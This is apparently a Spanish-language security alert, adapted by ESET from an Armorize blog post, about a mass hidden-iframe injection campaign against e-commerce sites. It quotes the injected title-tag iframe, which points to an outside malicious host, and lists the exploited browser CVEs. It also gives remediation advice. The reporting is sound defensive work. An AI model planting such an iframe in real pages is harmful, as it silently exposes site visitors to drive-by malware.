Un grupo de investigadores publicó en su blog, una nueva alerta de un ataque masivo a páginas con inyección de iframe activo, que estuvo particularmente focalizado en sitios de e-commerce. El ataque fue reportado con más de 90 mil páginas afectadas. El iframe permite la ejecución de contenido externo en la página que se está visitando. De esta forma, los visitantes de todos los sitios afectados podían infectarse con malware por el solo hecho de visitar un sitio web de confianza.
A través de diversas vulnerabilidades, todas las páginas afectadas se encuentran con la siguiente inyección de iframe:
(http://www.imagengratis.org/images/iframe1.png)
<title>Wholesaler<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe></title>Una vez que el usuario visita alguna de las web infectadas, se ejecuta en la maquina del usuario, a través de un ataque multi-stage, código javascript que explota las siguientes vulnerabilidades que afectan al explorador web:
- CVE-2010-0840 – Java Trust
- CVE-2010-0188 – PDF LibTiff
- CVE-2010-0886 – Java SMB
- CVE-2006-0003 – IE MDAC
- CVE-2010-1885 – HCP
Los dominios donde se alojan los exploit se encuentran en Rusia y son bloqueadas por nuestro software de seguridad. Analizando los sitios donde se encontraba presente este iframe, pudimos encontrar que estos son sensibles a inyecciones de SQL.
Es por eso que ante estos casos, si un desarrollador se encuentra ante este problema, debería revisar el código fuente de todas las páginas del sitio, para buscar este tipo de contenido no legítimo y verificar si el sitio web está infectado. Así también es importante tener en cuenta los siguientes consejos:
- Que todas las contraseñas del FTP sean rotadas y se utilicen contraseñas fuertes para todos los usuarios. También se recomienda borrar usuarios que no estén en uso.
- Que el sistema operativo no tenga vulnerabilidades, es decir que que todas las actualizaciones de software estén instaladas.
- Que las aplicaciones (especialmente la aplicación web o el gestor de contenidos) también tengan todos los parches de seguridad instalados.
Vale destacar que, a este momento, se encuentran en el mismo enlace del buscador provisto por los investigadores, muchos más sitios web infectados por el mismo incidente:
(http://www.imagengratis.org/images/googleiframe.gif)
El código malicioso que se descarga en el último paso del ataque, es un troyano.
Fuente: http://blog.armorize.com/
Adaptación: Laboratorios ESET